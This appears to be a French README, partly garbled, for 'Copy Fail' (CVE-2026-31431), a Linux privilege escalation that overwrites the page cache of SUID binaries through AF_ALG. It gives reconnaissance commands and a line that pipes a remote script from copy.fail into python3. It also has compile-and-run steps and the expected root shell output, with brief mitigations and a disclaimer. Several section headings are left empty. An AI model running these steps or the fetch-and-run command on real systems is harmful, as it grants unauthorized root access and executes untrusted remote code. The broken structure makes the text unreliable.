
La plupart des LPE Linux nécessitent une fenêtre de course ou un décalage spécifique au noyau. Copy Fail est une faille logique en ligne droite, elle n'a besoin d'aucun des deux. Le même script Python de 732 octets (ou ELF .c) donne les droits root sur toutes les distributions Linux publiées depuis 2017.
Ce contenu est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. N'exécutez PAS ceci sur des systèmes sans autorisation explicite.
Copy Fail (CVE-2026-31431) est une vulnérabilité d'élévation de privilèges locaux (LPE) sous Linux affectant l'API crypto du noyau via AF_ALG.
Elle permet à un utilisateur non privilégié d'écraser les données du cache de pages d'un binaire SUID (par exemple /usr/bin/su) et d'obtenir un accès root.
AF_ALG activéalgif_aead chargéos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicateurs attendus :
authencesn(hmac(sha256),cbc(aes))algif_aead chargépython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Résultat attendu :
uid=0(root)
os.splice not foundCause :
Solution :
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Causes possibles :
Installer les outils requis :
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Mettez à jour votre système :
apt update && apt upgrade
Si l'exploit échoue, envisagez :
Utilisez cet exploit de manière responsable dans les laboratoires, les CTF et les pentests autorisés uniquement.